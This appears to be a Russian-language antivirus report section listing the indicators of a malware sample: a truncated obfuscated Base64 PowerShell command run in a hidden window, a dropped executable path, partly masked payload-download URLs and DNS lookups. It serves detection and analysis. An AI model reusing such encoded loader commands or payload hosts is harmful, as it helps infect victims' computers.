Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAWQAwAEcAdAA9ACAAWwBUAFkAUABlAF0AKAAiAHsAMwB9AHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBpAFIAZQBDAHQAbwAnACwAJwBSACcALAAnAFkAJwAsACcAUwB5AFMAVABFAG0ALgBpAG8ALgBkACcAKQ...
- %HOMEPATH%\tr1uc6c\ge5row1\avfs1cem.exe
- %HOMEPATH%\tr1uc6c\ge5row1\avfs1cem.exe
- http://www.ro#####presshair.com/wp-content/upgrade/Ete/
- http://ti###bor.com/images/Du1/
- http://03##hhd.com/cgi-bin/q/
- DNS ASK ro#####presshair.com
- DNS ASK kb###.ilmci.com
- DNS ASK ti###bor.com
- DNS ASK 03##hhd.com
- DNS ASK so#####e-capital.com
- DNS ASK di####lklinik.com
- DNS ASK qu#####mathtutors.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAWQAwAEcAdAA9ACAAWwBUAFkAUABlAF0AKAAiAHsAMwB9AHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBpAFIAZQBDAHQAbwAnACwAJwBSACcALAAnAFkAJwAsACcAUwB5AFMAVABFAG0ALgBpAG8ALgBkACcAKQ...' (со скрытым окном)